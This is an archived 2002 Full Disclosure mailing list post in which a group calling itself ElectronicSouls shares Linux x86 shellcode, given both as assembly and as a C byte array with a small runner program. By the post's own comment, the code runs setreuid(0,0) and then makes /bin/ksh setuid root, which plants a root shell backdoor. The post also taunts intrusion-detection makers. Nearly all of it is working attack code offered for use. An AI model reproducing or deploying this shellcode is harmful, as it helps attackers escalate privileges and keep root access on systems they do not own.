Full Disclosure mailing list archives
[ElectronicSouls] - Deadly Shellcode
From: es () hush com
Date: Fri, 29 Nov 2002 09:31:36 -0800
-----BEGIN PGP SIGNED MESSAGE----- Dear List, Our shellcoding genius has provided us with yet another 0day shellcode. Please do not make IDS signatures for this,then replay your network traffic through Snort to catch us! # cat chmod-ksh.c /* (C) Steele [ElectronicSouls] */ /*************************************** * xor ebx, ebx * * mov ecx, ebx * * mov al, 0x46 * * int 0x80 * * * * mov al, 0x0f * * push ebx * * push dword 0x68736b2f * * push dword 0x6e69622f * * mov ebx, esp * * mov cx, 0x9ed * * int 0x80 * *************************************** * since bash has a cold heart * *************************************** * roc-a-steele * ***************************************/ #define DID_YOU_KNOW "that this code does setreuid(0,0)"\ "then does chmod("/bin/ksh", 4755);" unsigned char shellcode[] = "\x31\xdb" "\x89\xd9" "\xb0\x46" "\xcd\x80" "\xb0\x0f" "\x53" "\x68\x2f\x6b\x73\x68" "\x68\x2f\x62\x69\x6e" "\x89\xe3" "\x66\xb9\xed\x09" "\xcd\x80"; int main() { /* modified from lamagra's execute chroot shellcode */ int (*funct)(); funct = (int (*)()) shellcode; printf("size = %d\n",strlen(shellcode)); (int)(*funct)(); } # The Electronic Souls Crew [Electronicsouls] (c) 2002 "The game of go is complex." -----BEGIN PGP SIGNATURE----- Version: Hush 2.2 (Java) Note: This signature can be verified at https://www.hushtools.com/verify wlMEARECABMFAj3npIsMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltzjYAn1S5/lZt5LGK oh066BNZmnT2AWZpAJ9eg0QVkUWsE3PfCfWpfEMOUzDCLw== =6TaJ -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [ElectronicSouls] - Deadly Shellcode es (Nov 29)